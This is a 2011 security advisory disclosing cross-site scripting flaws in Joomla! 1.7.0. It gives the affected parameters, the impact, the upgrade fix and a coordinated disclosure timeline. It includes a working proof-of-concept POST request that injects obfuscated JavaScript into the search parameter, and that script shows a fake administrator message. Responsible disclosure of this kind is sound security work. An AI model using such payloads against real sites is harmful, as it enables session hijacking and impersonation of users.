SecurityvulnsSECURITYVULNS:DOC:27083Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities
Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities
- OVERVIEW
Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
Scripting issues.
- BACKGROUND
Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.
- VULNERABILITY DESCRIPTION
Several parameters (searchword, extension, asset, author ) in Joomla!
Core components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.
- VERSION AFFECTED
1.7.0 <=
- PROOF-OF-CONCEPT/EXPLOIT
component: com_search, parameter: searchword (Browser: IE, Konqueror)
[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: /
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456
task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&option=com_search
[/REQUEST]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
User Login is required to execute the following XSSes.
Parameter: extension, Component: com_categories
Parameter: asset , Component: com_media
Parameter: author, Component: com_media
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- IMPACT
Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.
- SOLUTION
Upgrade to Joomla! 1.7.1-stable or higher.
- VENDOR
Joomla! Developer Team
http://www.joomla.org
- CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
- DISCLOSURE TIME-LINE
2011-07-29: notified vendor
2011-09-26: patched version, 1.7.1-stable, released
2011-09-29: vulnerability disclosed
- REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.7.0-stable%5D_cross_site_scripting%28XSS%29
Vendor Advisory URLs:
http://developer.joomla.org/security/news/367-20110901-core-xss-vulnerability
http://developer.joomla.org/security/news/368-20110902-core-xss-vulnerability
#yehg [2011-09-29]